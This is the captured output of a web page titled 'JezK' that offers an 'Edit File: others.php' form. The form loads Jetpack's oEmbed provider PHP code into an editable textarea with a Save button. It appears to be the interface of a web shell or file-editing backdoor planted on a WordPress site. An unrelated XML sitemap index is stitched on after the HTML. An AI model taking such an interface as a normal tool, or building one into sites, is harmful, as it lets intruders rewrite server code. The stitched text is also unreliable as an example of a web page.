
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>JezK</title>
<style>
    body {
        font-family: Arial, sans-serif;
        margin: 0;
        padding: 0;
    }
    #container {
        max-width: 800px;
        margin: 20px auto;
        padding: 20px;
        border: 1px solid #ccc;
        border-radius: 5px;
        background-color: #f9f9f9;
    }
    h1 {
        text-align: center;
        color: #333;
    }
    h2 {
        margin-top: 30px;
        color: #555;
    }
    ul {
        list-style-type: none;
        padding: 0;
    }
    li {
        margin-bottom: 10px;
    }
    a {
        text-decoration: none;
        color: #007bff;
    }
    a:hover {
        text-decoration: underline;
    }
    form {
        margin-top: 20px;
    }
    input[type="text"], input[type="file"], input[type="submit"] {
        margin-bottom: 10px;
    }
    hr {
        border: 0;
        height: 1px;
        background-color: #ccc;
        margin-top: 20px;
        margin-bottom: 20px;
    }
</style>
</head>
<body>
<div id="container">
    <h1>JezK</h1>
    <h2>Edit File: others.php</h2><form method="post"><textarea name="file_content" rows="10" cols="50">&lt;?php
/**
 * Extra oEmbed providers that we use on wpcom for feature parity.
 *
 * This file will be loaded even when you don&#039;t use the Shortcodes feature,
 * as these embeds are considered safe to use on any site
 * (and may end up embedded in Core in the future).
 *
 * @package automattic/jetpack
 */

wp_oembed_add_provider( &#039;https://me.sh/*&#039;, &#039;https://me.sh/oembed?format=json&#039; );
wp_oembed_add_provider( &#039;#https?://(www\.)?gfycat\.com/.*#i&#039;, &#039;https://api.gfycat.com/v1/oembed&#039;, true );
wp_oembed_add_provider( &#039;#https?://[^.]+\.(wistia\.com|wi\.st)/(medias|embed)/.*#&#039;, &#039;https://fast.wistia.com/oembed&#039;, true );
wp_oembed_add_provider( &#039;#https?://sketchfab\.com/.*#i&#039;, &#039;https://sketchfab.com/oembed&#039;, true );
wp_oembed_add_provider( &#039;#https?://(www\.)?icloud\.com/keynote/.*#i&#039;, &#039;https://iwmb.icloud.com/iwmb/oembed&#039;, true );
wp_oembed_add_provider( &#039;#https?://(www\.)?icloud\.com\.cn/keynote/.*#i&#039;, &#039;https://iwmb.icloud.com.cn/iwmb/oembed&#039;, true );
wp_oembed_add_provider( &#039;#https?://((song|album|artist|pods|playlist)\.link|odesli\.com?|mylink\.page)/.*#&#039;, &#039;https://odesli.co/oembed&#039;, true );
wp_oembed_add_provider( &#039;#https?://(www\.)?loom\.com/share/.*#i&#039;, &#039;https://www.loom.com/v1/oembed&#039;, true );

/**
 * Filters the HTTP request timeout value so that we can increase the timeout for iCloud oEmbeds.
 *
 * @param int    $timeout The timeout value in seconds.
 * @param string $url     The URL to fetch.
 *
 * @return int The timeout value in seconds.
 */
function jetpack_oembed_timeout_override( $timeout, $url ) {
	if ( str_contains( $url, &#039;iwmb.icloud.com&#039; ) ) {
		return 10;
	}
	return $timeout;
}

// TODO: Remove this. This should hopefully be a temporary hack since Apple&#039;s oEmbed often seems to take more than 5 seconds to respond. 10 is an arbitrary number of seconds that seems to work better.
add_filter( &#039;http_request_timeout&#039;, &#039;jetpack_oembed_timeout_override&#039;, 10, 2 );

// WordPress core only registers pca.st, not pcast.pocketcasts.net.
wp_oembed_add_provider( &#039;#https?://pcast\.pocketcasts\.net/.+#i&#039;, &#039;https://pcast.pocketcasts.net/oembed.json&#039;, true );
</textarea><br><input type="submit" value="Save"></form></div>
</body>
</html>

<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="https://looker.af/wp-sitemap-index.xsl" ?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"><sitemap><loc>https://looker.af/wp-sitemap-posts-post-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-posts-page-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-taxonomies-category-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-users-1.xml</loc></sitemap></sitemapindex>
